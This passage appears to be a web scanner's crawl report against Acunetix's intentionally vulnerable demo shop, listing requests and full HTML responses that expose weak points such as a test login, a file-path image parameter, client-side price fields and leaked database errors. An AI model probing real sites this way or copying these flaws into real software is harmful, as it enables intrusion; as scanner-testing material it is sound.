type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/login.php |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 260 bytes. |
GET http://testphp.vulnweb.com/login.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:48 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5523 |
Response Body - size: 5,523 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>login page</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <h3>If you are already registered please enter your login information below:</h3><br> <form name="loginform" method="post" action="userinfo.php"> <table cellpadding="4" cellspacing="1"> <tr><td>Username : </td><td><input name="uname" type="text" size="20" style="width:120px;"></td></tr> <tr><td>Password : </td><td><input name="pass" type="password" size="20" style="width:120px;"></td></tr> <tr><td colspan="2" align="right"><input type="submit" value="login" style="width:75px;"></td></tr> </table> </form> </div> <div class="story"> <h3> You can also <a href="signup.php">signup here</a>.<br> Signup disabled. Please use the username <font color='red'>test</font> and the password <font color='red'>test</font>. </h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/Mod_Rewrite_Shop/ |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 268 bytes. |
GET http://testphp.vulnweb.com/Mod_Rewrite_Shop/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:50 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 975 |
Response Body - size: 975 bytes. |
<html>
<div id="content"> <div class='product'><table><tr><td width='180px'><img src='images/1.jpg'></td><td width='400px'><a href='Details/network-attached-storage-dlink/1/'>Network Storage D-Link DNS-313 enclosure 1 x SATA</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/network-attached-storage-dlink/1/'>Price<br>359 €</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/2.jpg'></td><td width='400px'><a href='Details/web-camera-a4tech/2/'>Web Camera A4Tech PK-335E</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/web-camera-a4tech/2/'>Price<br>10 €</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/3.jpg'></td><td width='400px'><a href='Details/color-printer/3/'>Laser Color Printer HP LaserJet M551dn, A4</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/color-printer/3/'>Price<br>812 €</a></td></table></tr></div></div> </html> |
URL | http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/ |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 310 bytes. |
GET http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/ |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 170 |
Response Body - size: 170 bytes. |
Warning: mysql_connect(): Connection refused in /hj/var/www/database_connect.php on line 2
Website is out of order. Please visit back later. Thank you for understanding. |
URL | http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 327 bytes. |
GET http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/ |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:01 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 170 |
Response Body - size: 170 bytes. |
Warning: mysql_connect(): Connection refused in /hj/var/www/database_connect.php on line 2
Website is out of order. Please visit back later. Thank you for understanding. |
URL | http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 314 bytes. |
GET http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/ |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 170 |
Response Body - size: 170 bytes. |
Warning: mysql_connect(): Connection refused in /hj/var/www/database_connect.php on line 2
Website is out of order. Please visit back later. Thank you for understanding. |
URL | http://testphp.vulnweb.com/privacy.php |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 262 bytes. |
GET http://testphp.vulnweb.com/privacy.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 227 bytes. |
HTTP/1.1 404 Not Found
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:50 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 16 |
Response Body - size: 16 bytes. |
File not found.
|
URL | http://testphp.vulnweb.com/product.php?pic=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:06 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6428 |
Response Body - size: 6,428 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>The shore</h2><div class='story'><p><a href='showimage.php?file=./pictures/1.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/1.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $500</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='500'><input type='hidden' name='addcart' value='1'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:07 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6368 |
Response Body - size: 6,368 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Mistery</h2><div class='story'><p><a href='showimage.php?file=./pictures/2.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/2.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Donec molestie. Sed aliquam sem ut arcu.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $800</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='800'><input type='hidden' name='addcart' value='2'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:08 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6401 |
Response Body - size: 6,401 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>The universe</h2><div class='story'><p><a href='showimage.php?file=./pictures/3.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/3.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet. Donec molestie. Sed aliquam sem ut arcu.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $986</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='986'><input type='hidden' name='addcart' value='3'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site 